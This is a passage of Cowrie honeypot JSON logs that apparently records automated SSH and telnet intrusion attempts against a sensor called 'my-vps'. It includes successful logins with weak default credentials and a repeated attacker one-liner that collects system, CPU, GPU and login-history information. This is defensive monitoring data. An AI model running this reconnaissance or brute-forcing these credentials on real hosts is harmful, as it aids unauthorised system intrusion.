256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:14:05.728124Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:14:06.999271Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:14:07.476554Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.477376Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.478142Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.479278Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.481351Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.482144Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.482997Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.484698Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.485274Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.485782Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.486240Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.487228Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.487961Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.709455Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.710886Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:14:07.711946Z","src_ip":"212.227.235.229","session":"f741688b3d6e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":55230,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2c869358397","protocol":"ssh","message":"New connection: 27.112.79.123:55230 (1.2.3.4:22) [session: e2c869358397]","sensor":"my-vps","timestamp":"2025-08-28T11:14:21.718705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:14:21.719894Z","src_ip":"27.112.79.123","session":"e2c869358397"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:14:21.991506Z","src_ip":"27.112.79.123","session":"e2c869358397"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123","message":"login attempt [guest/123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:14:23.115122Z","src_ip":"27.112.79.123","session":"e2c869358397"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:14:24.395784Z","src_ip":"27.112.79.123","session":"e2c869358397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36496,"dst_ip":"1.2.3.4","dst_port":22,"session":"689e14746dd0","protocol":"ssh","message":"New connection: 212.227.125.160:36496 (1.2.3.4:22) [session: 689e14746dd0]","sensor":"my-vps","timestamp":"2025-08-28T11:14:35.907448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:14:35.909062Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:14:36.078229Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:14:36.866210Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:14:37.221919Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.222611Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.223470Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.224482Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.225668Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.226466Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.227195Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.228394Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.228959Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.229624Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.230318Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.230950Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.231765Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.403385Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.404263Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:14:37.405915Z","src_ip":"212.227.125.160","session":"689e14746dd0"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.28","src_port":46712,"dst_ip":"1.2.3.4","dst_port":23,"session":"231db660d72d","protocol":"telnet","message":"New connection: 176.65.148.28:46712 (1.2.3.4:23) [session: 231db660d72d]","sensor":"my-vps","timestamp":"2025-08-28T11:14:53.938466Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:14:53.978785Z","src_ip":"176.65.148.28","session":"231db660d72d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:14:53.995709Z","src_ip":"176.65.148.28","session":"231db660d72d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54020,"dst_ip":"1.2.3.4","dst_port":22,"session":"13316db32886","protocol":"ssh","message":"New connection: 212.227.125.160:54020 (1.2.3.4:22) [session: 13316db32886]","sensor":"my-vps","timestamp":"2025-08-28T11:15:22.937316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:15:23.012116Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:15:23.171963Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:15:24.210649Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:15:24.733518Z","src_ip":"212.227.125.160","session":"13316db32886"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z 